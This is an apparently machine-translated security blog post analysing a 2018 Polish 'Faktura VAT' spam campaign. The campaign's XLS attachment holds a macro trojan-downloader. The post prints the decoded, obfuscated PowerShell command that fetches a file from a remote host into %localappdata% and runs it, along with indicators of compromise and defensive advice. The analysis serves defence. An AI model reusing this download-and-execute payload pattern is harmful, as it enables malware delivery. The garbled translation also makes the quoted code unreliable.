Note on a new spam campaign. In the title of the "Invoice" and possible banking trojan!

To spam you get used. Spam can be reconciled. Spam you can fight in a variety of ways. However, you hand of God protects you from opening on production systems this type of suspicious attachments. Our readers, who still have a head on his shoulders, they decided to share samples of spam that reach to their businesses or cooperating with them clients.

This time to the sender are sent personalized messages that contain attached file XLS with the name of the consignee. The message is delivered to the local server on the public IP address " 102.69.113.194 " (Republic of Mauritius) with " [email protected] ".

Faktura VAT wiadomość

In the annex you will find 3 files:

  • HTML
  • TXT
  • XLS is named " VAT2018-02-NazwaOdbiorcy "

HTML file contains Polish language fake text information about the delivery of the invoice:

Hello!

In annex I send a Vat invoice, it will also be sent to Your postal address. Please payment within 14 days of the service of the invoice.

I cordially greet

In this particular case the TXT file is empty, but the most interesting is the XLS file, which contains the statement makrowirusa:

Faktura VAT spam

Decoded VBA code suggests that we have to deal with malware trojan-downloader. The macro starts the process of cmd. exe, then powershell. exe and gets from the remote host " formaversa.co " (IP 47.74.146.191 on port 443) malicious file temp.exe that is saved in a temporary location, and then run.

Decoded:

cmd/c "poweRSheLL-NoniNTeRACtivE-NoPr-the Swedish melodi ByPASS-WinDO hIDDen" to {sleep 25; (( "{2} {0} {1}"-f'-', 'bject ', ' new ') ("{1} {3} {5} {0} {2} {4}"-f't ', 'syst ', '. webclie ', ' em ', ' nt ', ' ne ')). ('d ' + 'ow ' + 'nloadfil ' + ' e '). Invoke (' https: '//formaversa.co/trq, '% localappdata% ')} while (! $?); & (' {0} ' {2} ' {1} '-f'star ', ' SS ', 't-process ') '% localappdata%. ' ""

The first symptoms of action pest informed us the reader, which thank you for the information provided:

In any case (Win 7, XP, Vista, but I do not know how many bit) equipment he blue screen and after a while off. The launch fails. Windows stops on boot loaderze. On Win 7, you cannot log on to user accounts, because the profiles are damaged.

On some stacjonarkach I have avast for business. Here the spreadsheets have launched in green boxes and PCs have released (analysis of malware in the sandbox,.). Where are the Eset or Kaspersky and disc drives, lasted several minutes. In laptops with SSD fan CPU gave Chad and shutdown went much more smoothly.

When you log on to one of the computers for VNC (hence it was possible to take a snapshot of the screen) you receive the following error message: "the user profile service failed the logon."

Uszkodzony profil

With a similar incident we had to deal with in the year 2015. The Russian company antivirus Doctor Web has analysed the same malware detected as W97M.DownLoader.507 that turned out to be a similar downloader'em, but carrying out the dangerous Trojan Banking Directive. In this case, the remote server downloaded is an executable file "temp" (analysis of VT) using PowerShell interpreter.

How to protect?

This attack vector is used, System mail protocol command interpreters and malicious VBA code. In considering this case, the spam campaign and many others, after the implementation of a comprehensive security gateway-level hosts and mail server using DKIM, it is possible to block similar spam campaign with the effectiveness of close to 100 percent.

Alternate host-level security are:

-The version of MS Office 2010 document with macros is not automatically started. Instead, a notification is displayed about blocked content. People that support the computer must manually activate macros, so it's best (in environments where it is possible) to completely block the ability to run them. Relevant user manual for administrators prepared the Microsoft.

-Using the security software, you may want to ensure that the rules for blocking running files from directories " %APPDATA% " and " %TEMP% ". In these locations the most is "dropped" malicious software.

-A different and very effective proactive protection against viruses, that retrieve anything from the Web, is blocking scripts that are started by the system processes, such as cmd. exe, powershell, wscript. exe, csrcipt. exe, etc. If possible it is best to block all attempts to network activity scripts and applications that support scripts. Some antivirus programs do this by default, and others have such functionality in security policy settings.

Additional information

Possible other names attached files XLS:

  • MIME-part--60115-84162 .xls
  • VAT2018-02-(mk) .xls
  • VAT2018-02-(Office) .xls
  • VAT2018-02-(pawel. janas) .xls
  • VAT2018-02-(bzamiara) .xls
  • VAT2018-02-(dominik. zak) .xls
  • VAT2018-02-(registration) .xls
  • VAT2018-02-(Tech) .xls
  • VAT2018-02-(nie_odpisuj) .xls

Header source:

Return-path: <[email protected]>
Delivery-date: Tue, 27 Feb 2018 08:56:25 + 0100
Received: from ([102.69.113.194]) with SMTP id 9bAB52E3; Tue, 27 Feb 2018 08:56:21 + 0100
Date: Tue, 27 Feb 2018 08:56:21 + 0100
Message-ID: <[email protected]>
From: [email protected]
Subject: =? iso-8859-2? Q? Faktura_VAT? =
MIME-Version: 1.0

Useful SHA256 checksums:

b994f52e749280fa397a7a6879d099016db0a302fc48b60b5fc581b0f2339789 (.exe)


Add new comment

The content of this field is kept private and will not be shown publicly.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.